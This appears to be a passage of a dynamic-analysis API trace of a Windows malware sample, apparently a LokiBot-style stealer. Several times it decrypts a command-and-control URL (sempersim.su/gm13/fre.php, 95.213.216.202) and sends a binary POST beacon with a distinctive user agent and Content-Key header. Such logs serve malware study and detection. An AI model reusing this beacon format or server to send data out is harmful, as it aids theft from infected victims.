0x633228 [0159.234] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0159.234] GetProcessHeap () returned 0x620000 [0159.234] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0159.234] GetProcessHeap () returned 0x620000 [0159.235] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0159.235] GetProcessHeap () returned 0x620000 [0159.235] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643368 | out: hHeap=0x620000) returned 1 [0159.235] GetProcessHeap () returned 0x620000 [0159.235] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643488 [0159.236] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0159.236] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0159.243] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0159.243] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63b7e8) returned 1 [0159.252] GetProcessHeap () returned 0x620000 [0159.252] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639308 [0159.253] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0159.253] CryptImportKey (in: hProv=0x63b7e8, pbData=0x639308*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d7d0) returned 1 [0159.254] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0159.254] CryptSetKeyParam (hKey=0x62d7d0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0159.255] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0159.255] CryptSetKeyParam (hKey=0x62d7d0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0159.255] GetProcessHeap () returned 0x620000 [0159.256] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639308 | out: hHeap=0x620000) returned 1 [0159.257] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0159.257] CryptDecrypt (in: hKey=0x62d7d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643488, pdwDataLen=0x19fcfc | out: pbData=0x643488, pdwDataLen=0x19fcfc) returned 1 [0159.258] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0159.258] CryptDestroyKey (hKey=0x62d7d0) returned 1 [0159.258] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0159.259] CryptReleaseContext (hProv=0x63b7e8, dwFlags=0x0) returned 1 [0159.259] GetProcessHeap () returned 0x620000 [0159.259] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0159.259] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0159.260] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0159.261] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0159.261] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0159.264] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0159.265] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0159.265] GetProcessHeap () returned 0x620000 [0159.265] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0159.265] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x644468*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ead8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0159.266] GetProcessHeap () returned 0x620000 [0159.266] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b620 [0159.266] socket (af=2, type=1, protocol=6) returned 0x308 [0159.267] connect (s=0x308, name=0x63ead8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0159.316] FreeAddrInfoW (pAddrInfo=0x644468*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ead8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0159.317] GetProcessHeap () returned 0x620000 [0159.317] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63b7e8 [0159.317] GetProcessHeap () returned 0x620000 [0159.317] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x644560 [0159.317] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0159.318] wvsprintfA (in: param_1=0x644560, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0159.318] GetProcessHeap () returned 0x620000 [0159.318] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0159.318] GetProcessHeap () returned 0x620000 [0159.319] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0159.319] GetProcessHeap () returned 0x620000 [0159.319] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x643050 [0159.319] GetProcessHeap () returned 0x620000 [0159.319] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x644560 [0159.320] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0159.320] wvsprintfA (in: param_1=0x644560, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0159.320] GetProcessHeap () returned 0x620000 [0159.321] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0159.321] GetProcessHeap () returned 0x620000 [0159.321] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0159.321] send (s=0x308, buf=0x63a880*, len=237, flags=0) returned 237 [0159.322] send (s=0x308, buf=0x6421e0*, len=159, flags=0) returned 159 [0159.322] GetProcessHeap () returned 0x620000 [0159.322] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x644560 [0159.322] recv (in: s=0x308, buf=0x644560, len=4048, flags=0 | out: buf=0x644560*) returned 237 [0161.119] GetProcessHeap () returned 0x620000 [0161.119] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0161.119] GetProcessHeap () returned 0x620000 [0161.119] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643050 | out: hHeap=0x620000) returned 1 [0161.120] GetProcessHeap () returned 0x620000 [0161.121] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0161.121] GetProcessHeap () returned 0x620000 [0161.121] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b7e8 | out: hHeap=0x620000) returned 1 [0161.121] closesocket (s=0x308) returned 0 [0161.122] GetProcessHeap () returned 0x620000 [0161.122] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b620 | out: hHeap=0x620000) returned 1 [0161.122] GetProcessHeap () returned 0x620000 [0161.122] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0161.122] GetProcessHeap () returned 0x620000 [0161.123] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643488 | out: hHeap=0x620000) returned 1 [0161.123] GetProcessHeap () returned 0x620000 [0161.123] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0161.123] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x644560, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x11fc) returned 0x308 [0161.126] Sleep (dwMilliseconds=0xea60) [0161.135] GetProcessHeap () returned 0x620000 [0161.135] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x642fc0 [0161.136] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0161.136] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0161.144] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0161.144] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba08) returned 1 [0161.153] GetProcessHeap () returned 0x620000 [0161.153] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x6390f8 [0161.154] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0161.154] CryptImportKey (in: hProv=0x63ba08, pbData=0x6390f8*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d190) returned 1 [0161.155] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0161.155] CryptSetKeyParam (hKey=0x62d190, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0161.156] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0161.156] CryptSetKeyParam (hKey=0x62d190, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0161.156] GetProcessHeap () returned 0x620000 [0161.157] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6390f8 | out: hHeap=0x620000) returned 1 [0161.157] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0161.158] CryptDecrypt (in: hKey=0x62d190, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x642fc0, pdwDataLen=0x19fcfc | out: pbData=0x642fc0, pdwDataLen=0x19fcfc) returned 1 [0161.158] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0161.159] CryptDestroyKey (hKey=0x62d190) returned 1 [0161.159] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0161.160] CryptReleaseContext (hProv=0x63ba08, dwFlags=0x0) returned 1 [0161.160] GetProcessHeap () returned 0x620000 [0161.160] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0161.160] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0161.161] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0161.161] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0161.162] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0161.163] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0161.163] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0161.164] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0161.164] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0161.164] GetProcessHeap () returned 0x620000 [0161.164] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x6332a0 [0161.164] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0161.164] GetProcessHeap () returned 0x620000 [0161.165] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6332a0 | out: hHeap=0x620000) returned 1 [0161.165] GetProcessHeap () returned 0x620000 [0161.165] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0161.165] GetProcessHeap () returned 0x620000 [0161.165] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642fc0 | out: hHeap=0x620000) returned 1 [0161.166] GetProcessHeap () returned 0x620000 [0161.166] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643368 [0161.167] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0161.171] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0161.178] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0161.178] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63bcb0) returned 1 [0161.185] GetProcessHeap () returned 0x620000 [0161.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x6390f8 [0161.186] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0161.186] CryptImportKey (in: hProv=0x63bcb0, pbData=0x6390f8*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0161.187] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0161.187] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0161.188] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0161.188] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0161.188] GetProcessHeap () returned 0x620000 [0161.188] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6390f8 | out: hHeap=0x620000) returned 1 [0161.189] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0161.189] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643368, pdwDataLen=0x19fcfc | out: pbData=0x643368, pdwDataLen=0x19fcfc) returned 1 [0161.190] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0161.190] CryptDestroyKey (hKey=0x62d710) returned 1 [0161.191] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0161.191] CryptReleaseContext (hProv=0x63bcb0, dwFlags=0x0) returned 1 [0161.191] GetProcessHeap () returned 0x620000 [0161.191] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0161.191] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0161.192] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0161.192] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0161.193] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0161.193] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0161.194] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0161.194] GetProcessHeap () returned 0x620000 [0161.194] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0161.194] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x643fe0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ea60*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0161.195] GetProcessHeap () returned 0x620000 [0161.195] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b670 [0161.195] socket (af=2, type=1, protocol=6) returned 0x30c [0161.195] connect (s=0x30c, name=0x63ea60*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0161.245] FreeAddrInfoW (pAddrInfo=0x643fe0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ea60*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0161.245] GetProcessHeap () returned 0x620000 [0161.245] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63bcb0 [0161.245] GetProcessHeap () returned 0x620000 [0161.246] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x644560 [0161.247] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0161.247] wvsprintfA (in: param_1=0x644560, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0161.247] GetProcessHeap () returned 0x620000 [0161.248] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0161.248] GetProcessHeap () returned 0x620000 [0161.248] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0161.248] GetProcessHeap () returned 0x620000 [0161.248] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x643098 [0161.248] GetProcessHeap () returned 0x620000 [0161.248] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x644560 [0161.249] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0161.250] wvsprintfA (in: param_1=0x644560, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0161.250] GetProcessHeap () returned 0x620000 [0161.250] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0161.250] GetProcessHeap () returned 0x620000 [0161.250] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0161.250] send (s=0x30c, buf=0x63a880*, len=237, flags=0) returned 237 [0161.251] send (s=0x30c, buf=0x6421e0*, len=159, flags=0) returned 159 [0161.251] GetProcessHeap () returned 0x620000 [0161.251] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x644560 [0161.251] recv (in: s=0x30c, buf=0x644560, len=4048, flags=0 | out: buf=0x644560*) returned 237 [0162.569] GetProcessHeap () returned 0x620000 [0162.569] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0162.569] GetProcessHeap () returned 0x620000 [0162.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643098 | out: hHeap=0x620000) returned 1 [0162.570] GetProcessHeap () returned 0x620000 [0162.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0162.570] GetProcessHeap () returned 0x620000 [0162.570] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63bcb0 | out: hHeap=0x620000) returned 1 [0162.570] closesocket (s=0x30c) returned 0 [0162.571] GetProcessHeap () returned 0x620000 [0162.571] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b670 | out: hHeap=0x620000) returned 1 [0162.571] GetProcessHeap () returned 0x620000 [0162.571] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0162.571] GetProcessHeap () returned 0x620000 [0162.571] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643368 | out: hHeap=0x620000) returned 1 [0162.571] GetProcessHeap () returned 0x620000 [0162.572] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0162.572] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x644560, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1208) returned 0x30c [0162.574] Sleep (dwMilliseconds=0xea60) [0162.590] GetProcessHeap () returned 0x620000 [0162.590] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x642ee8 [0162.591] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0162.591] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0162.597] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0162.597] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63b7e8) returned 1 [0162.652] GetProcessHeap () returned 0x620000 [0162.652] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x6390f8 [0162.652] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0162.653] CryptImportKey (in: hProv=0x63b7e8, pbData=0x6390f8*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0162.654] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0162.654] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0162.654] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0162.655] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0162.655] GetProcessHeap () returned 0x620000 [0162.655] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6390f8 | out: hHeap=0x620000) returned 1 [0162.656] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0162.656] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x642ee8, pdwDataLen=0x19fcfc | out: pbData=0x642ee8, pdwDataLen=0x19fcfc) returned 1 [0162.657] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0162.657] CryptDestroyKey (hKey=0x62d710) returned 1 [0162.658] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0162.658] CryptReleaseContext (hProv=0x63b7e8, dwFlags=0x0) returned 1 [0162.658] GetProcessHeap () returned 0x620000 [0162.658] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0162.659] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0162.659] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0162.660] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0162.660] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0162.661] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0162.661] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0162.661] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0162.662] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0162.662] GetProcessHeap () returned 0x620000 [0162.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633318 [0162.662] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0162.662] GetProcessHeap () returned 0x620000 [0162.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633318 | out: hHeap=0x620000) returned 1 [0162.663] GetProcessHeap () returned 0x620000 [0162.663] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0162.663] GetProcessHeap () returned 0x620000 [0162.663] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642ee8 | out: hHeap=0x620000) returned 1 [0162.663] GetProcessHeap () returned 0x620000 [0162.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x6435f0 [0162.664] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0162.664] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0162.690] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0162.690] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63bcb0) returned 1 [0162.697] GetProcessHeap () returned 0x620000 [0162.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638f78 